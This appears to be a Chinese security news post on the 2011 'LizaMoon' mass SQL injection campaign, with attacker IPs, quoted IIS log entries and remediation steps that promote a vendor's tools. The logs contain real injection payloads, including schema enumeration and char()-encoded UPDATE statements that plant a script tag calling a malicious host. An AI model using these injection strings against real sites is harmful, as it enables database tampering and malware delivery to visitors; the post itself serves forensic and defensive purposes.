国外安全厂商Websense最近发布警报称,一种名为“丽莎月亮(英文名:LizaMoon)”的SQL注入式黑客攻击正在席卷全球。短短数日内,受攻击的网页数量已迅猛增长到1030000个(截至4月2日10点),外媒报道称其“势如海啸爆发”,就连苹果等知名公司的网站也名列其中。同时,遭到“丽莎月亮”影响的中文网页数量也已达到46800个。
- 几个可疑IP: 95.64.9.18(来自罗马尼亚), 91.217.162.45(来自乌克兰,著名的邪恶网络)
- 网友提供珍贵的IISLog(进行入侵鉴识时,这是超重要的线索)
2011-03-11 16:34:45 W3SVC1746246233 *MYSERVERIP* GET /dir/linkdetail.aspx id=11011+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+TABLE_NAME+not+in+(SELECT+TOP+0+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))-- 80 - 91.217.162.45 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) 500 0 0
Doc.asp?id=PU12731+update+gCategoriasHistoricoTiposDescripciones+set+Descripcion=REPLACE(cast(Descripcion+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) ....省略, 用CHR(nn)一个字符一个字符组出</title><script src=httq:// lazemoon .com / ur . php></script>…%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- - 95.64.9.18 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) - 302 498
2011-03-29 17:56:49 <<my server ip address>> GET /<<pagename>>.asp prod=MG0011'+update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) ....省略, 用CHR(nn)一个字符一个字符组出</title><script src=httq:// lazemoon .com / ur . php></script>… %2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 80 - 95.64.9.18 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax)
解决方法
1.下载web杀毒软件,地址http://www.safe3.com.cn/works/884981847/view.aspx,使用挂马清除功能清除数据库中挂马字段数据。
2.下载并安装Safe3 Web应用防火墙保护网站,地址http://www.safe3.com.cn/works/271360615/view.aspx。
3.大功告成。